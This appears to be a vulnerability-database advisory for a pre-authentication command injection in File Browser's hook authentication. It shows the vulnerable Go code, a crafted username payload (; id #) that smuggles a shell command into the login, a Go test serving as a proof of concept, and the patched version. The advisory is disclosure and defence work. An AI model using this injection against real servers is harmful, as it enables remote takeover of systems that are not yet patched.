CVE-2026-54088Critical▾ AbyssalPoC availableFile Browser: Command Injection via Authentication Hook Shell Substitution (Pre-Authentication RCE)
▾ Abyssal zone — Critical with a public exploit or in-the-wild use
impact 52.3 · likelihood 0.2 · exploitation 12
A public proof-of-concept already exists for this vulnerability — see Exploit availability below.
Public exploit / PoC code seen in 1 source. Availability, not in-the-wild use.
Exploit-prediction probability, daily snapshots since Jul 10.
Disclosure to exploitation, from the record and what we observed since indexing it.
Disclosed via GHSA
0.5%
0.5% → 0.8%
1 GitHub repo
The Hook Authentication feature in File Browser allows administrators to delegate login verification to an external shell command. User-supplied credentials (username and password) are interpolated into this command string using os.Expand without sanitization. An unauthenticated remote attacker can inject shell metacharacters in the username or password field at the login screen, causing the server to execute arbitrary OS commands before any authentication takes place. This is a critical pre-authentication RCE.
auth/hook.goHookAuth.RunCommand| Metric | Value | Rationale |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable via the login endpoint over HTTP from any network |
| Attack Complexity (AC) | Low (L) | Single crafted HTTP request; no preparation needed |
| Attack Requirements (AT) | None (N) | No race condition or special timing required |
| Privileges Required (PR) | None (N) | No account required — pre-authentication attack |
| User Interaction (UI) | None (N) | Fully automated; no victim action needed |
| Vulnerable System Confidentiality (VC) | High (H) | Full read access to server filesystem and env |
| Vulnerable System Integrity (VI) | High (H) | Arbitrary file write/modification |
| Vulnerable System Availability (VA) | High (H) | Can kill processes, exhaust resources |
| Subsequent System Confidentiality (SC) | None (N) | No direct impact on downstream systems assumed |
| Subsequent System Integrity (SI) | None (N) | — |
| Subsequent System Availability (SA) | None (N) | — |
Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Base Score: 9.3 (Critical)
Note:
PR:Noneis the critical differentiator from vulnerabilities 01 and 02. Because the injection point is the unauthenticated login endpoint, no account or session is required. A single HTTP request to the login API is sufficient to achieve RCE.
| ID | Name | Role |
|---|---|---|
| CWE-78 | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') | Primary — attacker-supplied credentials embedded in shell command string via os.Expand |
| CWE-88 | Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') | Secondary — $USERNAME/$PASSWORD expansion injects additional shell commands |
| CWE-306 | Missing Authentication for Critical Function | Secondary — OS command execution is reachable before any authentication is verified |
HookAuth.RunCommand builds the authentication command and substitutes credential values using os.Expand:
// auth/hook.go
envMapping := func(key string) string {
switch key {
case "USERNAME":
return a.Cred.Username // directly from the HTTP login request body
case "PASSWORD":
return a.Cred.Password // directly from the HTTP login request body
default:
return os.Getenv(key)
}
}
for i, arg := range command {
if i == 0 { continue }
command[i] = os.Expand(arg, envMapping) // no escaping applied
}
os.Expand performs plain text substitution. There is no escaping, quoting, or validation of the credential values before they are embedded into the command string.
If an admin has configured the hook authentication command as:
sh -c "test $USERNAME = 'admin'"
...and an attacker submits the username ; id # at the login screen, the expanded command becomes:
sh -c "test ; id # = 'admin'"
The ; terminates the test expression and the shell executes id. The # comments out the remainder, preventing a syntax error. The attacker's command runs with the privileges of the File Browser process — without needing a valid account or password.
sh -c "test $USERNAME = 'admin'"
curl or the web UI) with:
; id #sh -c "test ; id # = 'admin'"
id command runs on the server, confirming pre-authentication RCE.No account is needed. The attacker does not need to know any valid credentials. A single request is sufficient.
An unauthenticated remote attacker can execute arbitrary OS commands on the server under the privilege level of the File Browser process. This is the most severe class of vulnerability in this codebase:
Any internet-facing File Browser instance with Hook Authentication enabled is fully compromised by a single malformed login attempt.
package auth
import (
"os"
"strings"
"testing"
)
func TestPoC_AuthHookInjection(t *testing.T) {
// Simulate the admin-configured hook authentication command.
// This represents a realistic configuration: verify the username via a shell expression.
a := &HookAuth{
Command: "sh -c $USERNAME",
Cred: hookCred{
// Attacker-supplied username from the login form.
// The password is irrelevant.
Username: "id ; echo injected",
Password: "anything",
},
}
// Simulate the RunCommand logic in auth/hook.go
command := strings.Split(a.Command, " ")
envMapping := func(key string) string {
if key == "USERNAME" {
return a.Cred.Username
}
return os.Getenv(key)
}
for i, arg := range command {
if i == 0 {
continue
}
// os.Expand substitutes $USERNAME with the attacker's input.
// The result is treated as a shell script — no escaping is applied.
command[i] = os.Expand(arg, envMapping)
}
// The shell will execute: sh -c "id ; echo injected"
expectedArg := "id ; echo injected"
if command[2] != expectedArg {
t.Errorf("Expected command argument %q, got %q", expectedArg, command[2])
}
t.Logf("Confirmed: malicious username was injected as a shell script. Executing: %v", command)
}
Pass credentials exclusively as environment variables, not as shell string substitutions. This feature is undocumented, so removing it should not cause issues.
github.com/filebrowser/filebrowser/v2 <= 2.63.5Upgrade to a patched release:
github.com/filebrowser/filebrowser/v2 2.63.6Field changes observed since this record was first indexed.
Connected by shared product, vendor, weakness, or advisory.
CVE-2026-25890High· 8.1File Browser has a Path-Based Access Control Bypass via Multiple Leading Slashes in URL
CVE-2025-53893HighFile Browser's Uncontrolled Memory Consumption vulnerability can enable DoS attack due to oversized file processing
CVE-2025-52996Low· 3.1File Browser's password protection of links is bypassable
CVE-2026-35607High· 8.1File Browser: Proxy auth auto-provisioned users inherit Execute permission and Commands
CVE-2026-62843Medium· 6.8File Browser: Archive builder turns backslash filenames into path traversal (zip-slip)
CVE-2026-62684Low· 2.7File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory